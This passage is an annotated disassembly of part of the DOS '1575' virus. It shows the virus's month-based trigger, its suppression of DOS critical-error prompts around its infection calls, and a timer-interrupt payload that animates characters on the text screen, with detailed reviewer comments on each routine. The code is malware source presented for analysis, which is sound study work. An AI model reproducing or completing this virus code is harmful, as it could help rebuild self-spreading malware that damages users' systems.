📄 1575病毒源程序分析(2) .txt
jz loc_31 ; Jump if zero
call sub_15 ; (065A)
dec byte ptr ds:data_6e
pop es
pop ds
pop di
pop si
data_35 db 5Dh
db 5Bh, 5Ah, 59h, 58h, 0C3h
loc_31:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
sub_10 endp
db 0
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_11 proc near
; Remember the caller's DS:DX as a far pointer inside the code segment:
;   cs:data_28 <- DS (segment half), cs:data_27 <- DX (offset half).
; What DS:DX points at is not visible in this listing.
; In:    ds:dx = pointer to record
; Out:   cs:data_28, cs:data_27 written
; Clobb: none (ax is saved and restored; push/pop/mov leave flags alone)
; Writing into CS-relative storage means the virus keeps its state inside
; its own code image (data and code share one segment).
push ax
push ds
pop ax ; ax = ds (there is no mov sreg->reg shortcut here)
mov cs:data_28,ax ; segment half
mov cs:data_27,dx ; offset half
pop ax
retn
sub_11 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_12 proc near
; Save the current INT 24h (DOS critical-error handler) vector and
; decode a 15-byte string into the code segment.
;   1. out 20h <- 0: writes value 0 to the master 8259 command port.
;      This is NOT the usual non-specific EOI (20h); the intent is not
;      evident from the listing - confirm before interpreting it.
;   2. INT 21h AH=35h, AL=24h returns the INT 24h vector in ES:BX; it is
;      stored as ds:data_3e (offset) / ds:data_2e (segment). DS is
;      whatever the caller left - it is not set here.
;   3. ES := CS, then the 15 bytes at ds:20Ah are copied to cs:219h with
;      20h added to each byte - a trivial un-obfuscation (0 -> ' ',
;      'A'..'Z' -> 'a'..'z'). 20Ah + 15 = 219h, so the decoded copy lands
;      in the 15 bytes immediately after the source. What 219h is used
;      for later is not visible here.
; In:    ds = segment holding the source bytes and the vector slots
; Out:   es = cs; cs:219h..227h written; data_3e/data_2e written
; Clobb: ax, bx, cx, si, di, es, flags
; Caveat: the direction flag is not cleared here (no cld), so the copy
; relies on DF being clear on entry.
push cs
mov al,0
out 20h,al ; port 20h, 8259-1 int command (value 0, not an EOI)
mov ax,3524h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx  -> current INT 24h handler
mov ds:data_3e,bx ; old INT 24h offset
mov bx,es
mov ds:data_2e,bx ; old INT 24h segment
pop es ; es = cs (pushed at entry)
mov si,20Ah ; source: ds:20Ah
mov di,219h ; destination: cs:219h
mov cx,0Fh ; 15 bytes
locloop_32:
lodsb ; String [si] to al
add al,20h ; ' ' - shift each byte up by 20h
stosb ; Store al to es:[di]
loop locloop_32 ; Loop if cx > 0
retn
sub_12 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_13 proc near
; Month-based trigger check. Reads the current month from the CMOS RTC
; and calls the payload installer sub_16 unless that month equals
; data_34, data_34+1 or data_34+2 (wrapping 13->1, 14->2 via sub_14).
; In other words the payload is armed once the clock is at least three
; months past the month recorded in data_34 (presumably the month of
; infection - where data_34 is written is not visible here).
; Out-of-range values (0 or >12) on either side disable the trigger.
; In:    ax = a segment value; on the trigger path it is popped straight
;        into DS before sub_16 is called (see the pop ds below)
; Out:   ds = es = cs (both paths; sub_16 may leave es changed)
; Clobb: bl, flags; al and whatever sub_16 clobbers on the trigger path
; Encoding caveat: CMOS register 8 (month) is read raw and compared with
; binary 0Ch, and `inc bl` / `sub bl,0Ch` assume binary months too. The
; RTC is commonly left in BCD mode (CMOS reg 0Bh bit 2 clear), where
; October-December read as 10h-12h and fail the `ja loc_34` test, so the
; effective trigger window should be confirmed rather than assumed.
push ax
push cs
pop ds ; ds = cs so data_34 is read from the virus image
push cs
pop es ; es = cs
mov bl,data_34 ; reference month, expected 1..12
cmp bl,0Ch
ja loc_34 ; Jump if above: data_34 > 12 -> no trigger
cmp bl,0
je loc_34 ; Jump if equal: data_34 == 0 -> no trigger
mov al,8
out 70h,al ; port 70h, RTC addr/enabl NMI
; al = 8, month register
in al,71h ; port 71h, RTC clock/RAM data: al = current month
cmp al,0Ch
ja loc_34 ; Jump if above: month > 12 -> no trigger
cmp al,0
je loc_34 ; Jump if equal: month == 0 -> no trigger
cmp al,bl
je loc_34 ; Jump if equal: same month as data_34 -> no trigger
inc bl
call sub_14 ; (064F) bl = data_34+1, wrapped into 1..12
cmp al,bl
je loc_34 ; Jump if equal: following month -> no trigger
inc bl
call sub_14 ; (064F) bl = data_34+2, wrapped into 1..12
cmp al,bl
je loc_34 ; Jump if equal: month after that -> no trigger
pop ds ; NOTE: pops the ax pushed at entry INTO DS - the stack stays
; balanced, but DS now holds the caller's AX, i.e. the caller passes the
; segment sub_16 should work in via ax
call sub_16 ; (0686) install the payload (timer-tick hook)
push cs
pop ds
retn
;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
sub_14:
; Wrap a month counter: bl > 12 -> bl - 12 (bl <= 12 is returned as is).
; From sub_13 bl is always 2..14, so a single subtraction is enough.
cmp bl,0Ch
jbe loc_ret_33 ; Jump if below or =
sub bl,0Ch
loc_ret_33:
retn
loc_34:
; No-trigger exit: restore ax and return (ds = es = cs).
pop ax
retn
sub_13 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_15 proc near
; Infection driver with critical-error suppression: point INT 24h at
; ds:673h, run one of two routines chosen by the byte at ds:724h, then
; fall through - there is no retn in this proc - into the code Sourcer
; labelled int_24h_entry, which restores INT 24h and returns to our
; caller (the push ds here is matched by the pop ds there).
; In:    ds = the virus's data segment (ds:724h is examined; the new
;        vector is ds:673h)
; Calls: sub_3 (02AEh) when ds:[724h] == 'C', otherwise sub_4 (0337h);
;        both are outside this listing, and what 'C' discriminates
;        (two host/file kinds, presumably) is not visible here.
; NOTE(review): this proc sits at 065Ah and ends at 0672h, so 673h would
; be the int_24h_entry code if DS == the segment the disassembler
; assumed - but that code ends in retn, not iret, and cannot serve as a
; critical-error handler. The three bytes right after it (0B0h,3,0CFh =
; `mov al,3` / `iret`) are a proper handler that answers every
; critical error with AL=3 (fail), i.e. no Abort/Retry/Fail prompt
; while the virus writes to disk. Every absolute offset in this listing
; (673h, 724h, and the 69Ah/6AEh/6B0h family in sub_16/sub_17) lands on
; sensible bytes only when read 10h higher in the listing, so the virus
; seems to run with its segment base one paragraph above the one the
; disassembler used. Confirm against the raw bytes before trusting the
; data_xx labels.
mov dx,673h ; handler offset (ds-relative)
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx  -> INT 24h := ds:673h
cmp byte ptr ds:[724h],43h ; 'C'
jne loc_35 ; Jump if not equal
call sub_3 ; (02AE)
jmp short loc_36 ; (0672)
db 90h
loc_35:
call sub_4 ; (0337)
loc_36:
push ds ; popped again by the int_24h_entry code we fall into
sub_15 endp
;██████████████████████████████████████████████████████████████████████████
;
; External Entry Point
;
;██████████████████████████████████████████████████████████████████████████
int_24h_entry proc far
; Despite the name, this is the tail of sub_15, which falls through into
; it with ds pushed: restore INT 24h to data_32:data_33 (a saved vector;
; where it was saved is not visible here), pop the ds that sub_15
; pushed, and return to sub_15's caller with a NEAR return.
; It ends in retn rather than iret, so it cannot be a real INT 24h
; handler: Sourcer named it only because sub_15 installs ds:673h and
; this block sits at 0673h of the listing. The `mov al,3` / `iret`
; bytes that follow this proc (0B0h,3,0CFh, at 0683h by size, since
; sub_16 is at 0686h) are a well-formed critical-error handler that
; returns "fail"; if the virus's segment base is one paragraph above
; the disassembler's, ds:673h is exactly that stub. Confirm against
; the raw bytes.
; In:    ds on top of the stack (pushed by sub_15); data_32/data_33 =
;        segment/offset of the vector to reinstall
; Out:   INT 24h restored; ds = value popped from the stack
; Clobb: ax, dx, flags
mov dx,data_33 ; saved offset
mov ax,data_32 ; saved segment
mov ds,ax
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx  -> INT 24h := data_32:data_33
pop ds
retn ; near return to sub_15's caller
int_24h_entry endp
db 0B0h, 3, 0CFh
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_16 proc near
; Payload installer, called from sub_13 when the month trigger fires.
;   1. INT 1Ch (BIOS timer tick) := ds:6B0h.
;   2. ds:data_8e := 90h (NOP) - patches one byte of code somewhere not
;      visible here (self-modifying code).
;   3. es := 0B800h (conventionally the colour text-mode video buffer).
;   4. Execution then runs straight into the bytes Sourcer emitted as
;      data (data_36 onward), which decode as:
;        BF A0 0F   mov di,0FA0h    ; data_36 = opcode, data_37 = imm16
;        B8 20 07   mov ax,0720h    ; blank cell: ' ' with attribute 07h
;        B9 0B 00   mov cx,0Bh
;        F2 AB      rep stosw       ; 11 blank cells at es:di (just past
;                                   ; the 80x25 page, 0FA0h = 4000)
;        0E 07      push cs / pop es
;        C3         retn
;      so the proc actually returns from inside the "data".
;   5. The remaining bytes are not executed on this path. They look like
;      11 character/attribute cells - 20h/07h (blank), 0Fh/0Ah x8,
;      0F7h/0Eh, 0EEh/0Ch - followed by
;        90 FB 50 51 52 53 55 56 57 1E 06 0E 1F EB 0B 90
;      = nop / sti / push ax,cx,dx,bx,bp,si,di,ds,es / push cs / pop ds /
;      jmp short +0Bh / nop: the save-everything prologue of an
;      interrupt handler whose epilogue is loc_37 below (same registers,
;      reverse order, then iret). The jmp lands on the `mov ax,0B800h`
;      bytes that follow this proc; the 22-byte cell image is what that
;      handler copies to the screen and the 18 bytes from the first
;      0Fh/0Ah pair are what sub_17 searches for.
; NOTE(review): counting bytes from this proc's entry (0686h per the
; call in sub_13), ds:6B0h - the INT 1Ch target - is data_39 = 0Fh in
; the middle of the cell data, which is not executable code. Every
; absolute offset the code uses (6B0h, 69Ah, 69Ch, 6AEh here and in the
; handler, 673h and 724h in sub_15) lands on sensible bytes only when
; read 10h higher in the listing: 6B0h -> the nop/sti prologue, 6AEh ->
; the 0EEh head byte, 69Ah -> the 20h/07h blank cell, 69Ch -> the first
; 0Fh/0Ah pair. The virus therefore appears to run with its segment base
; one paragraph above the base the disassembler assumed, and Sourcer's
; data_36..data_39 labels name the byte 16 bytes BEFORE the one really
; patched. Confirm against the raw bytes before relying on the labels.
; In:    ds = virus data segment (the ax value sub_13's caller supplied)
; Out:   es = cs (via the push cs / pop es in the data bytes)
; Clobb: ax, cx, di, dx, es, flags, plus the patched bytes
mov dx,6B0h
mov ax,251Ch
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx  -> INT 1Ch := ds:6B0h
mov byte ptr ds:data_8e,90h ; plant a NOP somewhere (self-modifying)
nop
mov ax,0B800h
mov es,ax ; es -> text-mode video buffer
data_36 db 0BFh ; opcode of `mov di,imm16` (the loc_39 code zeroes this label)
data_37 dw 0FA0h ; its immediate, 0FA0h = byte just past the 80x25 page
db 0B8h, 20h, 7, 0B9h, 0Bh, 0 ; mov ax,0720h / mov cx,0Bh
db 0F2h, 0ABh, 0Eh, 7, 0C3h, 0 ; rep stosw / push cs / pop es / retn
db 0, 0, 20h, 7, 0Fh ; then the cell image: ' '/07h, 0Fh/0Ah ...
db 0Ah
data_38 db 0Fh ; the handler toggles the byte it calls 6AEh between 0EEh and 0F0h
db 0Ah
data_39 db 0Fh ; sub_17 writes 0CFh (iret) to the byte it calls 6B0h
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh
db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h
db 0Eh, 0EEh, 0Ch, 90h, 0FBh, 50h ; ... 0F7h/0Eh, 0EEh/0Ch; nop / sti / push ax
db 51h, 52h, 53h, 55h, 56h, 57h ; push cx, dx, bx, bp, si, di
db 1Eh, 6, 0Eh, 1Fh, 0EBh, 0Bh ; push ds, es / push cs / pop ds / jmp short +0Bh
db 90h
loc_37:
; Handler epilogue: pop everything the prologue above pushed, in reverse
; order, and return from the interrupt.
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
iret ; Interrupt return
sub_16 endp
; Body of the INT 1Ch (timer-tick) handler whose prologue is the
; nop/sti/push... byte run inside sub_16 and whose epilogue is loc_37.
; Sourcer left the first 31 bytes as data; they decode as:
;   B8 00 B8         mov ax,0B800h
;   8E C0            mov es,ax               ; es -> text video buffer
;   E8 2B 00         call +2Bh               ; = sub_17 by byte count
;   BE 9A 06         mov si,69Ah             ; 22-byte cell image
;   B9 16 00         mov cx,16h
;   F2 A4            rep movsb               ; paint it at es:di
;   80 3E AE 06 EE   cmp byte ptr [6AEh],0EEh
;   74 08            je loc_38               ; head byte is 0EEh -> 0F0h
;   C6 06 AE 06 EE   mov byte ptr [6AEh],0EEh ; otherwise -> 0EEh
;   EB 06            jmp short loc_39
;   90               nop
; Per tick, therefore: sub_17 locates the 18-byte key (image minus its
; leading blank cell) on screen and returns its offset in di (0 if
; absent); the full 22-byte image is painted starting two bytes before
; where the key was, so it advances one cell per tick, its leading
; blank cell erasing the old tail; the head byte at 6AEh flips between
; 0EEh and 0F0h; then (loc_39) the cell just past the painted image
; (di has advanced by 22) is read, given attribute 0Eh and stored into
; data_37, data_36 is zeroed, and control leaves through loc_37.
; NOTE(review): 6AEh/69Ah and the data_36..data_38 labels are absolute
; offsets. By byte count in this listing 6AEh is data_38 (= 0Fh, never
; 0EEh) and 69Ah is data_37, which makes no sense; read 10h higher they
; hit the 0EEh head byte and the 20h/07h blank cell exactly, so the
; virus's segment base seems to be one paragraph above the
; disassembler's and the labels name the byte 16 bytes before the real
; target (then data_37 := the image's first cell, and data_36 := 0 hits
; one of the zero bytes before it - a no-op). Confirm against raw bytes.
db 0B8h, 0, 0B8h, 8Eh, 0C0h, 0E8h ; mov ax,0B800h / mov es,ax / call ...
db 2Bh, 0, 0BEh, 9Ah, 6, 0B9h ; ... sub_17 / mov si,69Ah / mov cx ...
db 16h, 0, 0F2h, 0A4h, 80h, 3Eh ; ... 16h / rep movsb / cmp byte ptr ...
db 0AEh, 6, 0EEh, 74h, 8, 0C6h ; ... [6AEh],0EEh / je loc_38 / mov ...
db 6, 0AEh, 6, 0EEh, 0EBh, 6 ; ... byte ptr [6AEh],0EEh / jmp short loc_39
db 90h
loc_38:
mov data_38,0F0h ; head byte := 0F0h (absolute, ds-relative write)
loc_39:
mov ax,es:[di] ; cell just past the image that was painted
mov ah,0Eh ; keep its character, force attribute 0Eh
mov data_37,ax ; becomes the image's first cell next tick (see note)
mov data_36,0
jmp short loc_37 ; (06D0) restore registers and iret
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_17 proc near
; Find the 18-byte key at ds:69Ch in the text page at es and report
; where it is; if it sits in the last cell, switch the timer hook off.
;   - Scans es:[di] for di = 0, 2, 4, ..., 0F9Eh - every cell of an
;     80x25 text page (0FA0h = 4000 bytes) - comparing 18 bytes each
;     time. `pop di` does not touch flags, so ZF at `jz loc_41` is still
;     the cmpsb result. At the last few positions the compare reads
;     past 0FA0h into whatever follows the page.
;   - Found: di = offset of the match. Not found: di = 0.
;   - If di == 0F9Eh (row 24, column 79), writes 0CFh - the `iret`
;     opcode - to the byte at absolute 6B0h (Sourcer's data_39). That is
;     the same ds:6B0h sub_16 installed as the INT 1Ch vector, so the
;     tick handler becomes an immediate iret once the key reaches the
;     end of the screen.
; NOTE(review): by byte count in this listing data_39 is a 0Fh inside
; the cell data and 69Ch is the start of `mov ax,0720h` in sub_16, not a
; key; both make sense only if the virus's segment base is one
; paragraph above the disassembler's (then 69Ch is the first 0Fh/0Ah
; cell pair and 6B0h is the nop/sti handler prologue). Confirm against
; the raw bytes before relying on the labels.
; In:    ds = virus data segment; es = 0B800h (set by the caller)
; Out:   di = match offset or 0; the byte at 6B0h possibly patched
; Clobb: si, cx, flags (DF cleared)
mov di,0
loc_40:
mov si,69Ch ; key start (absolute, ds-relative)
push di
mov cx,12h ; 18 bytes
cld ; Clear direction
repe cmpsb ; Rept zf=1+cx>0 Cmp [si] to es:[di]
pop di ; restore the candidate offset; flags untouched
jz loc_41 ; Jump if zero: key found at di
inc di
inc di ; next cell (2 bytes: character + attribute)
cmp di,0FA0h
jne loc_40 ; Jump if not equal: more cells to try
mov di,0 ; not found anywhere on the page
loc_41:
cmp di,0F9Eh
jne loc_ret_42 ; Jump if not equal: not at the last cell
mov data_39,0CFh ; 6B0h := iret -> INT 1Ch handler disabled
loc_ret_42:
retn
sub_17 endp
db 43h, 0Ch, 0Ah
seg_a ends
end start